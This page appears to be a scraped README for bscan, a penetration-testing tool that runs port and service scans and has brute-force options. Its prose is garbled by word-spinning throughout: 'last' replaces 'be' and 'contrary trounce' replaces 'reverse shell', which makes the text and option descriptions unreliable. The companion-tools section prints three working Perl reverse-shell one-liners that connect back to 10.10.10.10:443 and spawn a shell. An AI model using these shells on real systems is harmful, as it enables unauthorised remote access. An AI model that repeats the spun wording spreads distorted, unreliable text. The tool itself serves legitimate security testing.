Bscan - An Asynchronous Target Enumeration Tool
bscan
is a command-line utility to perform active information gathering together with service enumeration. At its core, bscan
asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output together with a well-defined directory structure.Installation
bscan
was written to last run on Kali Linux, but in that place is naught inherently preventing it from running on whatever OS amongst the appropriate tools installed.Download the latest packaged version from PyPI:
pip install bscan
pip install https://github.com/welchbj/bscan/archive/master.tar.gz
Basic Usage
bscan
has a broad multifariousness of configuration options which tin last used to melody scans to your needs. Here's a quick example:$ bscan \ > --max-concurrency iii \ > --patterns [Mm]icrosoft \ > --status-interval 10 \ > --verbose-status \ > scanme.nmap.org
--max-concurrency 3
way that no to a greater extent than than iii concurrent scan subprocesses volition last run at a time--patterns [Mm]icrosoft
defines a custom regex pattern amongst which to highlight matches inwards the generated scan output--status-interval 10
tellsbscan
to impress runtime condition updates every 10 seconds--verbose-status
way that each of these condition updates volition impress details of all currently-running scan subprocessesscanme.nmap.org
is the host upon which nosotros desire to enumerate
bscan
also relies on simply about additional configuration files. The default files tin last constitute inwards the bscan/configuation
directory together with serve the next purposes:patterns.txt
specifies the regex patterns to last highlighted inwards console output when matched amongst scan outputrequired-programs.txt
specifies the installed programs thatbscan
plans on usingport-scans.toml
defines the port-discovering scans to last run on the target(s), equally good equally the regular expressions used to parse port numbers together with service names from scan outputservice-scans.toml
defines the scans last run on the target(s) on a per-service basis
Detailed Options
Here's what yous should encounter when running
bscan --help
:usage: bscan [OPTIONS] targets _ | |__ ___ ___ __ _ _ __ | '_ \/ __|/ __/ _` | '_ \ | |_) \__ \ (__ (_| | | | | |_.__/|___/\___\__,_|_| |_| an asynchronous service enumeration tool positional arguments: targets the targets and/or networks on which to perform enumeration optional arguments: -h, --help exhibit this assist message together with teach out --brute-pass-list F filename of password listing to utilization for brute-forcing --brute-user-list F filename of user listing to utilization for brute-forcing --cmd-print-width I the maximum integer pose out of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) --config-dir D the base of operations directory from which to charge the configuration files; required configuration files missing from this directory volition instead last loaded from the default files shipped amongst this computer program --hard strength overwrite of existing directories --max-concurrency I maximum integer pose out of subprocesses permitted to last running concurrently (defaults to 20) --no-program-check disable checking the presence of required arrangement programs --no-file-check disable checking the presence of files such equally configured wordlists --no-service-scans disable running scans on discovered services --output-dir D the base of operations directory inwards which to write output files --patterns [ [ ...]] regex patterns to highlight inwards output text --ping-sweep enable ping sweep filtering of hosts from a network hit earlier running to a greater extent than intensive scans --quick-only whether to alone run the quick scan (and non include the thorough scan over all ports) --qs-method southward the method for performing the initial TCP port scan; must represent to a configured port scan --status-interval I integer pose out of seconds to recess inwards betwixt printing condition updates; a non-positive value disables updates (defaults to 30) --ts-method southward the method for performing the thorough TCP port scan; must represent to a configured port scan --udp whether to run UDP scans --udp-method southward the method for performing the UDP port scan; must represent to a configured port scan --verbose-status whether to impress verbose runtime condition updates, based on frequency specified past times `--status-interval` flag --version computer program version --web-word-list F the wordlist to utilization for scans
Companion Tools
The original
bscan
computer program ships amongst ii utility programs (bscan-wordlists
together with bscan-shells
) to brand your life a petty easier when looking for wordlists together with trying to opened upwards contrary shells.bscan-wordlists
is a computer program designed for finding wordlist files on Kali Linux. It searches a few default directories together with allows for glob filename matching. Here's a uncomplicated example:$ bscan-wordlists --find "*win*" /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt /usr/share/wordlists/metasploit/sensitive_files_win.txt /usr/share/seclists/Passwords/common-passwords-win.txt
bscan-wordlists --help
to explore other options.bscan-shells
is a computer program that volition generate a multifariousness of contrary trounce one-liners amongst target
together with port
fields populated for you. Here's a uncomplicated lawsuit to listing all Perl-based shells, configured to connect dorsum to 10.10.10.10
on port 443
:$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl perl for windows perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;' perl amongst /bin/sh perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl without /bin/sh perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;'
bscan-shells
pulls these commands from the reverse-shells.toml
configuration file. Try bscan-shells --help
to explore other options.Development
Start past times setting upwards a novel evolution surroundings together with installing the requirements (using
virtualenvwrapper
/ virtualenvwrapper-win
):# setup the surroundings mkvirtualenv -p $(which python3) bscan-dev workon bscan-dev # teach the deps pip install -r dev-requirements.txt
flake8 . && mypy bscan
# construct source together with cycle distributions python setup.py bdist_wheel sdist # run post-build checks twine banking concern check dist/* # upload to PyPI twine upload dist/*